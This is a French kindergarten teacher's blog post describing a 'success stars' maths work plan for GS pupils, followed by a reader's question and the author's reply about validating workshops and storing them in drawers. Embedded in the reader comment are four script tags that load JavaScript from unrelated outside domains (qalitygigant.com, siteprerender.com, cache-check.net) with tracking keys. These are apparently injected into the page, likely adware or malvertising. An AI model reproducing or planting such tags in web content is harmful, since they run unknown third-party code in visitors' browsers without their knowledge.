• Etoiles de réussites maths GS

    Vous trouverez ici mes étoiles de maths pour mes GS.

    Le principe : sur des temps dédiés, les enfants ont leur plan de travail (ils démarrent tous à l'étoile blanche) et font les ateliers correspondants mis à disposition dans la classe (3 meubles de 12 tiroirs, un meuble correspond à un domaine, chaque tiroir correspond à une couleur d'étoile et à l'intérieur on retrouve tous les ateliers nécessaire au passage de l'étoile). Concernant le temps passé en étoile, je vous invite à jeter un œil à mon emploi du temps (ICI). 

    Je compte 2 étoiles par période (donc 10 à l'année). Si l'enfant peut aller plus vite, il le pourra bien entendu. J'aimerais qu'ils suivent cette cadence, je vais donner cet objectif car je ne veux pas que certains enfants se laissent porter (c'est ce qu'il s'est passé avec des CP l'an dernier, sans réel objectif donné, certains prennent beaucoup trop leur temps !).

    Ce domaine regroupe le travail autour des nombres, premiers calculs mais aussi un peu de géométrie et grandeurs et mesures. Concernant le travail autour des constructions avec divers outils et jeux (kaplas, legos, blocs logiques...) je travaille en brevets.

    Dans chaque étoile, des ateliers autonomes mais aussi des jeux qui seront faits en ateliers dirigés (si je vois que l'enfant est à l'aise, il valide suite à l'atelier, sinon je refais jouer un petit groupe d'élèves qui a besoin), et des QR codes qui renvoient vers des jeux en ligne.

    Je vous invite à les découvrir en bas de page. Je remercie d'avance tous les blogueurs qui mettent leurs ateliers en partage (et je sais le temps que ça prend, déjà de les fabriquer mais aussi de faire un article de blog pour les partager !!). Donc MERCI chers collègues !

    Vous trouverez la plupart des sources des ateliers dans la rubrique des mes anciens ateliers autonomes ICI ou dans la rubrique concernant les maths en maternelle ICI. Si vous ne retrouvez pas certains ateliers, n'hésitez pas à me demander en commentaire en bas de l'article et je vous mettrai les liens directs !

    Bonne lecture ! Et bon courage si vous souhaitez vous lancer !

    Etoiles de réussites maths GS

    Télécharger les plans de travail de maths GS

     

    Un petit commentaire si vous passez par là fait toujours plaisir ^^

     

     Les autres étoiles ICI

    Tous les derniers articles du blog

     

    Pin It

    Tags Tags : , , , ,
  • Commentaires

    1
    Nounette
    Vendredi 31 Juillet à 18:40

    Bonjour,

    Merci pour ces explications et tout ton travail ! Je me demande combien de fois les enfants font chaque atelier avant que tu le valides ? et je pense avoir mal compris, tu dis que tous les ateliers de la même étoile sont rangés dans un seul et même tiroir ?

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1596213489673" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>
      • Vendredi 31 Juillet à 23:22

        Bonjour. En fait, ce n'est pas vraiment une histoire de nombre de fois, mais je vois si l'enfant est à l'aise avec la notion ou non. Parfois, je valide au bout d'une fois et même si l'atelier n'est pas terminé car je vois que l'enfant est vraiment très à l'aise. D'autre fois, il aura fallu beaucoup d'aide, donc je préfère qu'il refasse 2/3 fois avant de valider.

        Et oui, tous les ateliers sont rangés dans un même tiroir, chaque atelier est fermé dans un sac de congélation IKEA. Si l'atelier est trop gros (si c'est un jeu par exemple), il est rangé dans un autre meuble, en libre accès aussi.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :